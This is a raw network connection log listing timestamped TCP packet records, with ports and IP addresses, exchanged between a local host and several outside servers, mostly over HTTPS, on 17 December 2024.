Dec 17, 2024 19:57:13.533312082 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.540957928 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.541191101 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.541275978 CET	49745	443	192.168.2.4	104.17.25.14
Dec 17, 2024 19:57:13.541290998 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.542658091 CET	49745	443	192.168.2.4	104.17.25.14
Dec 17, 2024 19:57:13.548724890 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.548948050 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.549041033 CET	49745	443	192.168.2.4	104.17.25.14
Dec 17, 2024 19:57:13.549324989 CET	49745	443	192.168.2.4	104.17.25.14
Dec 17, 2024 19:57:13.549355984 CET	443	49745	104.17.25.14	192.168.2.4
Dec 17, 2024 19:57:13.573982000 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:13.574861050 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:13.574903965 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:13.576566935 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:13.576662064 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:13.577801943 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:13.577896118 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:13.577996016 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:13.578013897 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:13.597501040 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:13.598043919 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:13.598084927 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:13.599767923 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:13.599868059 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:13.600713968 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:13.600806952 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:13.600891113 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:13.600907087 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:13.629086018 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:13.644829035 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:13.816317081 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:13.817121029 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:13.817133904 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:13.817984104 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:13.818092108 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:13.819565058 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:13.819621086 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:13.819967985 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:13.819976091 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:13.863931894 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.045775890 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:14.045932055 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:14.046005964 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:14.047034025 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:14.047080040 CET	443	49748	108.178.43.142	192.168.2.4
Dec 17, 2024 19:57:14.047108889 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:14.047166109 CET	49748	443	192.168.2.4	108.178.43.142
Dec 17, 2024 19:57:14.074971914 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.129106998 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.146295071 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146328926 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146372080 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.146379948 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146404028 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146434069 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.146437883 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146452904 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.146460056 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.146516085 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.146541119 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.280419111 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.280503035 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.280519009 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.280591011 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.280631065 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.280653954 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.280958891 CET	49746	443	192.168.2.4	192.229.133.221
Dec 17, 2024 19:57:14.280975103 CET	443	49746	192.229.133.221	192.168.2.4
Dec 17, 2024 19:57:14.331779003 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.331974030 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.332041025 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.332055092 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.332104921 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.332127094 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.332180023 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.336631060 CET	49747	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.336638927 CET	443	49747	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.491415977 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.491436958 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:14.491503954 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.491775036 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:14.491791010 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.281277895 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.281452894 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.281461954 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.282870054 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.282928944 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.283201933 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.283284903 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.283328056 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.327327967 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.331907988 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.331913948 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.390445948 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.508142948 CET	443	49741	142.250.181.132	192.168.2.4
Dec 17, 2024 19:57:16.508227110 CET	443	49741	142.250.181.132	192.168.2.4
Dec 17, 2024 19:57:16.508328915 CET	49741	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:57:16.816400051 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.816483021 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.816539049 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.816553116 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.816565990 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.816597939 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.816637039 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.822057009 CET	49751	443	192.168.2.4	152.199.21.175
Dec 17, 2024 19:57:16.822072029 CET	443	49751	152.199.21.175	192.168.2.4
Dec 17, 2024 19:57:16.825392008 CET	49741	443	192.168.2.4	142.250.181.132
Dec 17, 2024 19:57:16.825397015 CET	443	49741	142.250.181.132	192.168.2.4
Dec 17, 2024 19:57:19.677406073 CET	49723	80	192.168.2.4	2.20.68.210
Dec 17, 2024 19:57:19.817734957 CET	80	49723	2.20.68.210	192.168.2.4
Dec 17, 2024 19:57:19.817856073 CET	49723	80	192.168.2.4	2.20.68.210
Dec 17, 2024 19:57:22.523098946 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.523171902 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:22.523272991 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.523389101 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.523456097 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:22.523521900 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.524225950 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.524260044 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:22.524574995 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:22.524617910 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.743181944 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.743438959 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.743484020 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.745002031 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.745095968 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746090889 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746107101 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746190071 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746216059 CET	443	49762	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.746295929 CET	49762	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746623039 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746674061 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.746761084 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746959925 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.746977091 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.747277021 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.747464895 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.747483969 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.748910904 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.748992920 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.749828100 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.749828100 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.749864101 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.749917030 CET	443	49761	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.749988079 CET	49761	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.750036001 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.750068903 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:23.750129938 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.750329971 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:23.750345945 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.106504917 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.106798887 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.106863022 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.108324051 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.108400106 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.109293938 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.109381914 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.109483004 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.109498978 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.112703085 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.112905025 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.112952948 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.114626884 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.114726067 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.115757942 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.115849972 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.115890980 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.159344912 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.160547972 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.160571098 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:25.160587072 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:25.207443953 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.069644928 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:26.069920063 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:26.070003986 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.070841074 CET	49764	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.070883036 CET	443	49764	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:26.214318991 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.214344978 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:26.214452982 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.214798927 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:26.214814901 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.077500105 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.077584982 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.077697039 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.079709053 CET	49763	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.079751968 CET	443	49763	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.223109007 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:27.223197937 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:27.223361015 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:27.223726034 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:27.223754883 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:27.461096048 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.470315933 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.470380068 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.474016905 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.474106073 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474395990 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474395990 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474447012 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474590063 CET	443	49767	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.474656105 CET	49767	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474737883 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.474775076 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:27.474863052 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.475126028 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:27.475137949 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.699843884 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.700362921 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:28.700383902 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.702018023 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.702184916 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:28.702717066 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:28.702805042 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:28.702974081 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.754357100 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:28.754379034 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:28.801249027 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:29.315349102 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.315853119 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.315886021 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.317435980 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.317524910 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.317537069 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.317728996 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.318990946 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.319156885 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.319185972 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.359421968 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.362960100 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.363018990 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.411851883 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.698065042 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:29.698230028 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:29.698307037 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:29.699340105 CET	49769	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:29.699368000 CET	443	49769	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:29.862546921 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.862742901 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.862864971 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.863428116 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.863428116 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:29.863478899 CET	443	49768	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:29.863745928 CET	49768	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:30.649760008 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.649846077 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:30.649944067 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.650558949 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.650607109 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:30.650835037 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.650870085 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.650882006 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:30.651592970 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:30.651612043 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.881661892 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.881956100 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.881983995 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.885262012 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.885476112 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.885521889 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.885920048 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.886154890 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.886614084 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.886634111 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.886693001 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.886799097 CET	443	49771	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.886873007 CET	49771	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.887295008 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.887417078 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.887775898 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.888181925 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.888231039 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.889400959 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.889488935 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.889880896 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.889913082 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.889959097 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.890151978 CET	443	49770	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.890221119 CET	49770	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.890291929 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.890328884 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:31.890393019 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.890626907 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:31.890644073 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.132186890 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.132631063 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.132694960 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.134465933 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.134560108 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.134970903 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.135065079 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.135152102 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.135180950 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.135221958 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.135236979 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.135391951 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.137195110 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.137262106 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.137603045 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.137739897 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.137746096 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.137835026 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.176433086 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.176511049 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.192044973 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.192054987 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:33.223345041 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:33.238909006 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.091624022 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:34.091758966 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:34.091815948 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.095520973 CET	49773	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.095532894 CET	443	49773	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:34.107074976 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.107136965 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:34.107207060 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.107922077 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:34.107939959 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.086246014 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.086513996 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.086591005 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.087743044 CET	49772	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.087764978 CET	443	49772	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.088447094 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:35.088537931 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:35.088618994 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:35.088886976 CET	49775	443	192.168.2.4	52.98.95.210
Dec 17, 2024 19:57:35.088922977 CET	443	49775	52.98.95.210	192.168.2.4
Dec 17, 2024 19:57:35.328217983 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.328737020 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.328795910 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.330560923 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.330636024 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331057072 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331089973 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331151009 CET	49774	443	192.168.2.4	104.21.81.229
Dec 17, 2024 19:57:35.331151962 CET	443	49774	104.21.81.229	192.168.2.4
Dec 17, 2024 19:57:35.331216097 CET	49774	443	192.168.2.4	104.21.81.229
